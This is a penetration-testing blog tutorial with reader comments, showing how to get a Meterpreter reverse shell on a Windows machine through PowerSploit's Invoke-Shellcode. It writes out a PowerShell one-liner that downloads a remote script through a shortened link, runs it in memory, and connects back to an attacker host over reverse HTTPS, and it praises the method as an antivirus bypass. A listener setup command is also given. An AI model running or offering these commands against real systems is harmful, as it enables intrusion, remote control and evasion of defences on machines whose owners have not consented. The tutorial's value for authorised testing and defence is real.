PowerSploit: The Easiest Shell You'll Ever Get - Pentest Geek

PowerSploit: The Easiest Shell You’ll Ever Get

Author: Chris Campbell Posted In Penetration Testing Tutorials On: 2013/09/18 Comments: 5
PowerSploit: The Easiest Shell You'll Ever Get

Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.

PowerSploit  is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET  so you may already be using it!  Many of the scripts in the project are extremely useful in post-exploitation in Windows environments.  The PowerSploit project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode.

In order for PowerSploit to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script:

script

To start the multi/handler and configure it for PowerSploit, we just run the script:

python StartListener.py 192.168.0.15 443

Now that our handler is ready, we can move on to executing our shell.  The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly:

bitly

Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the PowerSploit function and pass it to Invoke-Expression to put it into memory:

IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’)

Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:

Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force

We can actually combine these commands to run a single command to execute our shell:

IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force

powershell

Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:

meterpreter

That is the easiest and most convenient AV-bypass I have ever seen!  Just open PowerShell and type a command.  Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier.  You can find more ways at my  blog and by following me on twitter.  Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber.  I hope to see you all there!

-Chris


Share this article

Facebooktwittergoogle_plusredditpinterestlinkedinmailFacebooktwittergoogle_plusredditpinterestlinkedinmail
5 Comments
  • Uhhhhhhhhh…..

    Why did you put your IP in that server start command? Cause…. That’s REALLY not secure.

    *I think it should be “127.0.0.1 443” which is the local host address.

    -McFlyAF

  • Hi,
    Actually tried your trick, it did not work, -Payload doesn’t exist after reading raw shell code from github! maybe it changed ?

  • Something terrible may have just happened and you have no idea what because you
    just arbitrarily download crap from the Internet and execute it.
    At line:53 char:6
    + throw <<<< 'Something terrible may have just happened and you have no idea w
    hat because you just arbitrarily download crap from the Internet and execute it
    .'
    + CategoryInfo : OperationStopped: (Something terri…and execute
    it.:String) [], RuntimeException
    + FullyQualifiedErrorId : Something terrible may have just happened and yo
    u have no idea what because you just arbitrarily download crap from the In
    ternet and execute it.

  • Anthony Esdaile 2014/12/17 at 8:02 PM

    Really impresses me seeing someone use PowerShell for pen testing I just wish there were more people as this subject seems to be pretty scarce within the PowerShell community

    Any more good resources you can recommend

  • I thought it was awesome that powershell will download a webpage and store it as a string that you could later execute so I wrote a quick script based off this. It will allow you to pick a url that a powershell script is held and then execute it. Or it will host a script on a basic ruby webserver that can either be http or https.

    https://github.com/b00stfr3ak/fast_meterpreter

  • Leave a Reply

    Your email address will not be published. Required fields are marked *

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    Share This

    Recent Posts

    Subscribe To Our Mailing List

    The Ultimate Burp Suite Training Program

    Learn Network Penetration Testing

    Penetration Testing

    Categories

    Metasploit

    Web Application Hacking


    Copyright 2024

    css.php

    Are You Using the Top 5 Pentest Tools?

    Enter your email address to download your copy of our FREE e-book and find out now!

    Thank you, now go check your email!!